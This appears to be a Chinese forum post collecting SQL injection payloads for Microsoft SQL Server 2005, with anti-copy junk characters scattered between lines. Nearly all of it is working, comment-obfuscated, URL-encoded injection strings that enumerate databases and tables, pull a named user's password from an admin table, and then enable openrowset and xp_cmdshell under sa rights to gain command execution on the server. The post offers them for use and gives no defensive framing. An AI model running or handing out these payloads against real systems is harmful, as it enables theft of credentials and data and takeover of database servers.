MSsql2005注入语句

admin

. g% W9 S2 w4 _* K% g8 C2 o5 p. S
+ Y; B+ n4 I( [: c# f[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

' N. U: j5 g0 s! a" {5 W6 x+ J爆表语句,somedb部份是所要列的数据库，红色数字1累加


[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
( B% ^5 \. ^) q5 l' N
爆字段语句，爆表admin里user='icerover'的密码段
* |# n% U9 a) U, G7 e

. W$ V1 ?7 H$ \8 {[Copy to clipboard]CODE:
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
- }5 M- Q& o, E/ G* n+ O
2 @6 z  e. J; G. j& ^5 dmssql2005默认没有开xp_cmdshell的，openrowset也不能用
如果是sa权限，可以这样来开启
开启openrowset
1 \5 m; y. f$ R9 @& S, k' @

[Copy to clipboard]CODE:
: B7 `8 v: b" x/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
+ W$ p- `: s0 D# A; O4 H/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
3 Q$ z( @. e9 p
4 u5 L# e: t% L1 T6 p2 y! n9 ]开启xp_cmdshell
! e' B% Q' k* y! }  ?8 b- }; M: B

[Copy to clipboard]CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

+ ^- I6 k- Z, h2 t; Gok,over~~晚安